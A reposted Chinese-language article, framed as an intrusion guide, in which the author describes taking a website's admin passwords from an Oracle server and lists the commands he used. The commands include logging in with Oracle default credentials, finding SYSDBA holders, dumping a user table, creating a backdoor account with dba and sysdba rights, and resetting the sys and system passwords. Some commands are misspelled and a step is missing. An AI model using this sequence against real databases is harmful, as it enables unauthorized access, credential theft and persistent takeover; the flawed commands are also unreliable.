Home  >  Article  >  Database  >  入侵Oracle数据库能用到的技术

入侵Oracle数据库能用到的技术

WBOY
WBOYOriginal
2016-06-07 16:55:561066browse

最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现Oracle操作起

最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者.

1、su – oracle 不是必需,适合于没有DBA密码时使用,,可以不用密码来进入sqlplus界面。

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

3、SQL>connect / as sysdba ;(as sysoper)或

connect internal/oracle AS SYSDBA ;(scott/tiger)

conn sys/change_on_install as sysdba;

4、SQL>startup; 启动数据库实例

5、 查看当前的所有数据库: select * from v$database;

select name from v$database;

desc v$databases; 查看数据库结构字段

7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:

SQL>select * from V_$PWFILE_USERS;

Show user;查看当前数据库连接用户

8、进入test数据库:database test;

9、查看所有的数据库实例:select * from v$instance;

如:ora9i

10、查看当前库的所有数据表:

SQL> select TABLE_NAME from all_tables;

select * from all_tables;

SQL> select table_name from all_tables where table_name like '%u%';

TABLE_NAME

------------------------------

_default_auditing_options_

11、查看表结构:desc all_tables;

12、显示CQI.T_BBS_XUSER的所有字段结构:

desc CQI.T_BBS_XUSER;

13、获得CQI.T_BBS_XUSER表中的记录:

select * from CQI.T_BBS_XUSER;

14、增加数据库用户:(test11/test)

create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

15、用户授权:

grant connect,resource,dba to test11;

grant sysdba to test11;

commit;

16、更改数据库用户的密码:(将sys与system的密码改为test.)

alter user sys indentified by test;

alter user system indentified by test;

linux

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn